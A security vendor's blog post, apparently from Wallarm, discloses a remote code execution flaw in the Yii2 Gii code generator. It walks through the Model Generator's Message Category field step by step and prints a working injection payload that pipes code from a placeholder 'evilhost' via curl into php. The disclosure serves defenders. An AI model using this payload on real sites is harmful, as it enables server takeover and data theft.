This article is written specifically for web developers who use a module. We will tell you how we got access to sensitive data on a staging server through Yii2 Gii Remote Code: First to the testing environment, and then to the production. Spoiler: We have notified the module developer about the problem and it will be fixed soon. A temporary patch is available on GitHub.
Ā
Gii is a module used to automatically generate code that implements some common website features: https://yiiframework.com.ua/ru/doc/guide/2/start-gii/
Ā
Let's get started.
Ā
The packages we use:Ā
"yiisoft/yii2-debug": "~2.1.0",
"yiisoft/yii2-gii": "^2.2",
"yiisoft/yii2-faker": "~2.0.0",
Yii2 Framework 2.0.35
Ā
You can find Gii at the addresses like:
https://localhost/index.php?r=gii%2Fdefault%2Findex https://localhost/gii/
To successfully exploit the vulnerability, go to the Model Generator section.
The application must have a database configured, otherwise the model cannot be generated.Ā
Also, you must specify the existing table name in the Table Name field.Ā
The remaining fields can be filled arbitrarily up to the Enable I18N checkbox.
Once you select it, the Message Category field appears.
That's exactly where the vulnerability is hidden:
aaa', 'a'),];}}system('curl https://evilhost/b|php');__halt_compiler(); Click Preview, then click Generate. The answer should be:
The code has been generated successfully.
And next there will be data on successful generation, including a path to the model.
The vulnerability exists due to insufficient filtering of incoming parameters in the generateString function of the yiisoft/yii2-gii/src/Generator.php#L505 file. The $ this->messageCategory parameter is not filtered and allows you to embed arbitrary php code into the model file.
Here is an example file with embedded php code:
To execute arbitrary code, you need to enter the created model it in the Model Class field of the Form Generator section. This vulnerability can be exploited in any type of code generation with the Enable I18N option available.
Since the vulnerability still exists, those who use the Yii2 Gii Remote Code module need to check the following:
We would also like to note that developers should not underestimate access to their staging server, as it can help attackers gain access to their resources.
Start your Wallarm WAF trial for free today: sales@wallarm.ru
Dimitris Georgiou has been a self-professed computer geek since the early 80s. At university, he…
Your board wants AI. Your developers are building with it. Your budget committee is asking…
AI systems are no longer just isolated models responding to human prompts. In modern production…
Broken authorization is one of the most widely known API vulnerabilities. It features in the…
The shadow technology problem is getting worse. Over the past few years, organizations have scaled…
API security has been a growing concern for years. However, while it was always seen…